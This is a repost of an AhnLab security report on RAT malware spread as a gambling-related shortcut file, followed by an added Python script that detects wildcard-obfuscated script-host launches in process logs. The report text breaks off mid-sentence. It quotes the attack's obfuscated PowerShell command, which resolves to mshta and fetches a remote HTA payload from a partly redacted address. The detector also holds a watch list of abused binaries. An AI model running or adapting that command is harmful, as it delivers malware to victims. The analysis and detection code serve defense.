Distribution of RAT Malware Disguised as a Gambling-related File
Malware Analysis, News and Indicators - Latest topics malware.news
AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA.
Figure 1. Operation process
The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script.
- PowerShell command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://193.***.***[.]253:7287/2.hta.hta’
Figure 2. LNK properties
The malicious …
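The command in the shortcut never contains the string "mshta": the wildcard path C:\W*\S*2\m*h?a.* only resolves to it at run time, so a plain keyword match on process command lines misses it. The following is an added example, not code from the ASEC report: a Python triage function that expands wildcard paths against a watch list of script-host binaries and alerts when one is paired with a remote URL. The watch list, the function names and the two benign sample lines are assumptions constructed for illustration.

```python
import fnmatch
import re

# Assumed watch list of script-host binaries; extend for your environment.
LOLBINS = [
    r"C:\Windows\System32\mshta.exe",
    r"C:\Windows\System32\wscript.exe",
    r"C:\Windows\System32\cscript.exe",
    r"C:\Windows\System32\rundll32.exe",
]
# Drive-rooted path token containing at least one wildcard (* or ?).
WILDCARD_PATH = re.compile(r"[A-Za-z]:\\[^\s'\"‘’]*[*?][^\s'\"‘’]*")
# Remote URL, including the defanged hxxp form used in reports.
REMOTE_URL = re.compile(r"h(?:tt|xx)ps?://[^\s'\"‘’]+", re.IGNORECASE)

# Command line as quoted on this page (address redacted and defanged there).
PAGE_CMD = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . "
            r"$env:C:\W*\S*2\m*h?a.* ‘hxxp://193.***.***[.]253:7287/2.hta.hta’")
# Constructed benign lines: no wildcard, and a wildcard that hits no watched binary.
BENIGN_CMDS = [
    r"powershell.exe -File C:\Scripts\backup.ps1",
    r"cmd.exe /c dir C:\Users\*\Documents\*.docx",
]


def resolve_wildcard_lolbins(command_line):
    """Return watch-list binaries a wildcard path in the command would expand to."""
    hits = []
    for token in WILDCARD_PATH.findall(command_line):
        # Windows paths are case-insensitive; '[' is made literal for fnmatch.
        pattern = token.replace("[", "[[]").lower()
        for binary in LOLBINS:
            if fnmatch.fnmatchcase(binary.lower(), pattern) and binary not in hits:
                hits.append(binary)
    return hits


def triage(command_line):
    """Classify one process-creation command line."""
    binaries = resolve_wildcard_lolbins(command_line)
    has_url = bool(REMOTE_URL.search(command_line))
    return {"binaries": binaries, "remote_url": has_url,
            "alert": bool(binaries) and has_url}


if __name__ == "__main__":
    for line in [PAGE_CMD] + BENIGN_CMDS:
        print(triage(line)["alert"], line)
```

Feed it the command-line field from process-creation logging (for example Sysmon Event ID 1 or Windows Security Event ID 4688 with command-line auditing enabled).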